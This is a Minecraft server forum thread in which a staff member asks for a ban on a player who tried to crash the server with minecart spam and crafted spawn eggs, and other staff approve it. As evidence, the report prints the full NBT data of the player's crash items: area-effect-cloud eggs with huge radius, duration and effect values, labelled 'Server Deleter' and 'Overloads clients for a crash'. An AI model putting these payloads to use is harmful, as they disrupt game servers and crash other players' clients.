Long Term Ban Request - pogchaep

Please Note: The TotalFreedom Forum has now been put into a read-only mode. Total Freedom has now closed down and will not be returning in any way, shape or form. It has been a pleasure to lead this community and I wish you all the best for your futures.
    • Official Post

    1. Username, UUID, IP(s), and short ban reason for each offender.

      uuid: '84e3eee5-f427-41c0-a20f-2df248a72866'
      reason: "Attempting to crash the server"

    2. What did they do?

    This user repeatedly attempted to lag and crash the server by first spamming minecarts, but was interrupted by me going into Creative Mode from Spectator Mode before he could even build the setup necessary to facilitate the crash. After I caught him and told him we had CoreProtect, he tried to repair damage they did to the spawn by placing target blocks (I had assumed he was merely griefing because of this). I then entered vanish because I had a sneaky suspicion that he was up to no good.

    This suspicion turned out to be correct, as he then attempted to use various items from a nearby exploit kit to crash the server and its players, specifically spawn eggs. As we know, the TotalFreedomMod strips NBT from entities spawned in with spawn eggs, so his attempts to crash the server failed miserably. That certainly didn't stop him from trying, though. He repeatedly used the eggs, hoping for the particles to crash players. It didn't, and the enderman spawn eggs he was hoping would spawn in massive particles instead spawned in regular endermen.

    So, he tried again with a different spawn egg, this time intending to simply jumpscare players. It too didn't work for the same reason. Clearly frustrated, he angrily griefed a build someone made, then finally resorted to the ol' reliable method of crashing servers: spamming minecarts again. Unaware that I was literally watching him do it, he proceeded to build the setup and begin spam placing the minecarts. I then doomed him almost immediately after he started placing them.

    3. What indefinitely bannable offense does this fall under according to the guidance for sanctions?

    1a. Attempts at harming the server.

    4. Add logs and/or screenshots of the occurrence here, and tag any witnessing staff.

    Clearly he wasn't going to build a rollercoaster with that rail.

    His various attempts to spawn in the particles and jumpscares (none of which ended up working):




    Finally, his futile attempt to crash the server with minecarts (with some bonus rage at the beginning), captured with the Replay Mod (click the image to see the video):


    NBT data of exploit items in his inventory:

    Code: ServerDeleter.nbt
    {Enchantments:[{id:"minecraft:protection",lvl:1s}],EntityTag:{Age:199999980,CustomName:'{"text":"DELETED!!!!","color":"red","bold":true}',CustomNameVisible:1b,Duration:199999980,DurationOnUse:9999999.0f,Effects:[{Amplifier:"9999999b",Duration:9999999,Id:1b},{Amplifier:"9999999b",Duration:9999999,Id:2b},{Amplifier:"9999999b",Duration:9999999,Id:3b},{Amplifier:"9999999b",Duration:9999999,Id:4b},{Amplifier:"9999999b",Duration:9999999,Id:5b},{Amplifier:"9999999b",Duration:9999999,Id:6b},{Amplifier:"9999999b",Duration:9999999,Id:7b},{Amplifier:"9999999b",Duration:"99999999999999",Id:8b},{Amplifier:"9999999b",Duration:9999999,Id:9b},{Amplifier:"9999999b",Duration:9999999,Id:10b},{Amplifier:"9999999b",Duration:9999999,Id:11b},{Amplifier:"9999999b",Duration:9999999,Id:12b},{Amplifier:"9999999b",Duration:9999999,Id:13b},{Amplifier:"9999999b",Duration:9999999,Id:14b},{Amplifier:"9999999b",Duration:9999999,Id:15b},{Amplifier:"9999999b",Duration:9999999,Id:16b},{Amplifier:"9999999b",Duration:9999999,Id:17b},{Amplifier:"9999999b",Duration:9999999,Id:18b},{Amplifier:"9999999b",Duration:9999999,Id:19b},{Amplifier:"9999999b",Duration:9999999,Id:20b},{Amplifier:"9999999b",Duration:9999999,Id:21b},{Amplifier:"9999999b",Duration:9999999,Id:22b},{Amplifier:"9999999b",Duration:9999999,Id:23b},{Amplifier:"9999999b",Duration:9999999,Id:24b},{Amplifier:"9999999b",Duration:9999999,Id:25b},{Amplifier:"9999999b",Duration:9999999,Id:26b},{Amplifier:"9999999b",Duration:9999999,Id:27b},{Amplifier:"9999999b",Duration:9999999,Id:28b},{Amplifier:"9999999b",Duration:9999999,Id:29b},{Amplifier:"9999999b",Duration:9999999,Id:30b},{Amplifier:"9999999b",Duration:9999999,Id:31b},{Amplifier:"9999999b",Duration:9999999,Id:32b}],Particle:"flame",Potion:"minecraft:long_weakness",Radius:9999999.0f,RadiusOnUse:9999999.0f,RadiusPerTick:9999999.0f,ReapplicationDelay:0,WaitTime:60,id:"minecraft:area_effect_cloud"},HideFlags:1,display:{Lore:['{"text":"This actually works XD"}','{"text":"don\'t place it down cuz u think "}','{"text":"it doesnt work XD"}','{"bold":true,"color":"red","text":"YOU HAVE BEEN WARNED!"}'],Name:'{"bold":true,"color":"red","text":"Krit\'s Server Deleter"}'}}
    Code: 666Unparticled.nbt
    {Enchantments:[{id:"minecraft:protection",lvl:1s}],EntityTag:{CustomName:'{"text":"666666666666666666666666666666666666666666666666666","color":"red","bold":true}',CustomNameVisible:1b,Duration:999999999,Effects:[{Amplifier:"255b",Duration:19999980,Id:20b}],Particle:"flame",Radius:0.0f,RadiusOnUse:0.0f,RadiusPerTick:0.0f,id:"minecraft:area_effect_cloud"},HideFlags:1,display:{Lore:['{"text":"666?","color":"red","bold":true}'],Name:'{"text":"666 Unparticled","color":"red","bold":true}'}}
    {EntityTag:{Duration:99999,Particle:"totem_of_undying",Radius:99999.0f,RadiusOnUse:99999.0f,RadiusPerTick:999999.0f,ReapplicationDelay:99999,id:"minecraft:area_effect_cloud"},display:{Lore:['{"text":"Overloads clients for a crash"}'],Name:'{"text":"Server Deleter"}'}}
    {EntityTag:{Effects:[{Amplifier:1b,Duration:900,Id:15b},{Amplifier:1b,Duration:9000,Id:20b}],Particle:"elder_guardian",Radius:700.0f,id:"minecraft:area_effect_cloud"},display:{Lore:['{"text":"Place to jumpscare everyone in "}','{"text":"radius, or everyone on the world idk"}','{"text":"it also crashes games"}'],Name:'{"text":"JumpScare"}'}}

    5. Are they known under any other names or IPs, and if so, are they currently (indefinitely) banned under those names and IPs?


    6. Duration of the ban.

    3 months.


  • I Vouch. This is insanely hilarious. Him breaking random shit out of frustration because his shitty skid eggs didn't work tops the cake.

    As the Ban Manager, I'm keeping this open until Saturday, April 15 at around 3 PM, EST so it doesn't sit unresolved for an inordinate amount.


    Edited once, last by Alco_Rs11 (April 9, 2023 at 6:01 PM).

  • Alco_Rs11 April 17, 2023 at 5:27 AM

    Closed the thread.